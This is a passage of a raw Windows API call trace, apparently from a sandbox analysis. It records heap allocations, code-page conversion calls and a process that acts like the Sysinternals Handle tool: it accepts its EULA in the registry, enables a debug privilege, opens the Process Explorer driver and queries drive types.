Flags=0x8, Size=0x6c) returned 0x1d1820 [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x62) returned 0x1d18a0 [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x78) returned 0x1d1910 [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x62) returned 0x1d1990 [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x2e) returned 0x1cdde0 [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x48) returned 0x1c6540 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x1c) returned 0x1c5ee0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x28) returned 0x1c5f10 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x1a) returned 0x1c5f40 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x4a) returned 0x1d1a00 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x72) returned 0x1d1a60 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x30) returned 0x1cde20 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x2e) returned 0x1cde60 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x1c) returned 0x1c5f70 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0xd2) returned 0x1d1ae0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x7c) returned 0x1d1bc0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x3a) returned 0x1c6590 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x90) returned 0x1d1c50 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x24) returned 0x1c5fa0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x30) returned 0x1cdea0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x36) returned 0x1cdee0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x3c) returned 0x1c65e0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x52) returned 0x1d1cf0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x3c) returned 0x1c6630 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x18) returned 0x1d1d50 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x82) returned 0x1d1d70 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x2e) returned 0x1cdf20 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x1e) returned 0x1c5fd0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x2c) returned 0x1cdf60 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x54) returned 0x1d1e00 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x52) returned 0x1d1e60 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x2a) returned 0x1cdfa0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x3c) returned 0x1c6680 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x54) returned 0x1d1ec0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x24) returned 0x1c6000 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x30) returned 0x1cdfe0 [0238.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x8c) returned 0x1d1f20 [0238.330] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d0b10 | out: hHeap=0x1b0000) returned 1 [0238.331] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x1000) returned 0x1cffd0 [0238.331] GetLastError () returned 0x0 [0238.331] SetLastError (dwErrCode=0x0) [0238.331] GetLastError () returned 0x0 [0238.332] SetLastError (dwErrCode=0x0) [0238.332] GetLastError () returned 0x0 [0238.332] SetLastError (dwErrCode=0x0) [0238.332] GetACP () returned 0x4e4 [0238.332] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x228) returned 0x1d0fe0 [0238.332] GetLastError () returned 0x0 [0238.332] SetLastError (dwErrCode=0x0) [0238.332] IsValidCodePage (CodePage=0x4e4) returned 1 [0238.332] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe00 | out: lpCPInfo=0x12fe00) returned 1 [0238.332] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f8a0 | out: lpCPInfo=0x12f8a0) returned 1 [0238.332] GetLastError () returned 0x0 [0238.332] SetLastError (dwErrCode=0x0) [0238.332] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.332] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ暢ᨳ觩") returned 256 [0238.332] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ暢ᨳ觩", cchSrc=256, lpCharType=0x12fbc0 | out: lpCharType=0x12fbc0) returned 1 [0238.332] GetLastError () returned 0x0 [0238.332] SetLastError (dwErrCode=0x0) [0238.333] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.333] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0238.333] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0238.333] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0238.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x12f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0238.333] GetLastError () returned 0x0 [0238.333] SetLastError (dwErrCode=0x0) [0238.333] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.333] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0238.333] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0238.333] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0238.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x12fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0238.333] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x100) returned 0x1d1210 [0238.334] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0238.334] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1d1210) returned 0x100 [0238.334] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0238.334] GetProcAddress (hModule=0x77940000, lpProcName="IsWow64Process") returned 0x779491d0 [0238.334] GetCurrentProcess () returned 0xffffffffffffffff [0238.335] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x12fef0 | out: Wow64Process=0x12fef0) returned 1 [0238.335] GetLastError () returned 0x0 [0238.335] SetLastError (dwErrCode=0x0) [0238.335] GetLastError () returned 0x0 [0238.335] SetLastError (dwErrCode=0x0) [0238.335] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x0) returned 0x2 [0238.336] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x7c) returned 0x0 [0238.336] RegQueryValueExW (in: hKey=0x7c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x12fc40, lpcbData=0x12fc48*=0x4 | out: lpType=0x0, lpData=0x12fc40*=0x0, lpcbData=0x12fc48*=0x4) returned 0x2 [0238.336] RegCloseKey (hKey=0x7c) returned 0x0 [0238.336] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x7c) returned 0x0 [0238.336] RegQueryValueExW (in: hKey=0x7c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x12fc40, lpcbData=0x12fc48*=0x4 | out: lpType=0x0, lpData=0x12fc40*=0x1, lpcbData=0x12fc48*=0x4) returned 0x0 [0238.336] RegCloseKey (hKey=0x7c) returned 0x0 [0238.336] GetLastError () returned 0x0 [0238.336] SetLastError (dwErrCode=0x0) [0238.336] GetLastError () returned 0x0 [0238.336] SetLastError (dwErrCode=0x0) [0238.336] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x12fc38 | out: phkResult=0x12fc38*=0x7c) returned 0x0 [0238.337] RegSetValueExW (in: hKey=0x7c, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x12fc30*=0x1, cbData=0x4 | out: lpData=0x12fc30*=0x1) returned 0x0 [0238.337] RegCloseKey (hKey=0x7c) returned 0x0 [0238.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x0) returned 1 [0238.338] GetCurrentProcess () returned 0xffffffffffffffff [0238.338] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12e3e0 | out: TokenHandle=0x12e3e0*=0x7c) returned 1 [0238.338] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12e3e8 | out: lpLuid=0x12e3e8*(LowPart=0x14, HighPart=0)) returned 1 [0238.736] AdjustTokenPrivileges (in: TokenHandle=0x7c, DisableAllPrivileges=0, NewState=0x12e3f0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0238.736] GetLastError () returned 0x0 [0238.736] CloseHandle (hObject=0x7c) returned 1 [0238.736] GetLastError () returned 0x0 [0238.736] SetLastError (dwErrCode=0x0) [0238.737] GetLastError () returned 0x0 [0238.737] SetLastError (dwErrCode=0x0) [0238.737] CreateFileW (lpFileName="\\\\.\\PROCEXP152" (normalized: "\\device\\procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0238.737] SeCaptureSubjectContext (in: SubjectContext=0xfffff880053c8598 | out: SubjectContext=0xfffff880053c8598) [0238.737] ExGetPreviousMode () returned 0xfffffa8002f00001 [0238.737] SePrivilegeCheck (in: RequiredPrivileges=0xfffff880053c85b8, SubjectSecurityContext=0xfffff880053c8598, AccessMode=0x1 | out: RequiredPrivileges=0xfffff880053c85b8) returned 1 [0238.737] SeReleaseSubjectContext (in: SubjectContext=0xfffff880053c8598 | out: SubjectContext=0xfffff880053c8598) [0238.737] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0238.739] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.739] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationProcess") returned 0x77ab14a0 [0238.739] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.739] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationThread") returned 0x77ab1560 [0238.739] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.739] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySystemInformation") returned 0x77ab1670 [0238.739] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.739] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySymbolicLinkObject") returned 0x77ab25d0 [0238.739] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.739] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryDirectoryObject") returned 0x77ab2440 [0238.740] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.740] GetProcAddress (hModule=0x77a60000, lpProcName="NtOpenSymbolicLinkObject") returned 0x77ab2310 [0238.740] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.740] GetProcAddress (hModule=0x77a60000, lpProcName="NtOpenDirectoryObject") returned 0x77ab1890 [0238.740] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.740] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryObject") returned 0x77ab1410 [0238.742] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.742] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySection") returned 0x77ab1820 [0238.742] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.742] GetProcAddress (hModule=0x77a60000, lpProcName="RtlInitAnsiString") returned 0x77ab7f80 [0238.742] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.742] GetProcAddress (hModule=0x77a60000, lpProcName="RtlInitUnicodeString") returned 0x77ab5280 [0238.742] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.742] GetProcAddress (hModule=0x77a60000, lpProcName="RtlAnsiStringToUnicodeString") returned 0x77ab4e50 [0238.742] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.742] GetProcAddress (hModule=0x77a60000, lpProcName="RtlFreeUnicodeString") returned 0x77ab5610 [0238.743] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.743] GetProcAddress (hModule=0x77a60000, lpProcName="RtlFreeAnsiString") returned 0x77ab5610 [0238.743] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0238.743] GetProcAddress (hModule=0x77a60000, lpProcName="RtlUnicodeStringToAnsiString") returned 0x77ab5c50 [0238.743] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x0, Length=0x0, ResultLength=0x0 | out: SystemInformation=0x0, ResultLength=0x0) returned 0xc0000004 [0238.743] GetLastError () returned 0x0 [0238.743] SetLastError (dwErrCode=0x0) [0238.743] GetLastError () returned 0x0 [0238.743] SetLastError (dwErrCode=0x0) [0238.743] GetDriveTypeW (lpRootPathName="A:\\") returned 0x1 [0238.743] GetLastError () returned 0x0 [0238.743] SetLastError (dwErrCode=0x0) [0238.743] GetLastError () returned 0x0 [0238.743] SetLastError (dwErrCode=0x0) [0238.744] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0238.744] GetLastError () returned 0x0 [0238.744] SetLastError (dwErrCode=0x0) [0238.744] GetLastError () returned 0x0 [0238.744] SetLastError (dwErrCode=0x0) [0238.744] 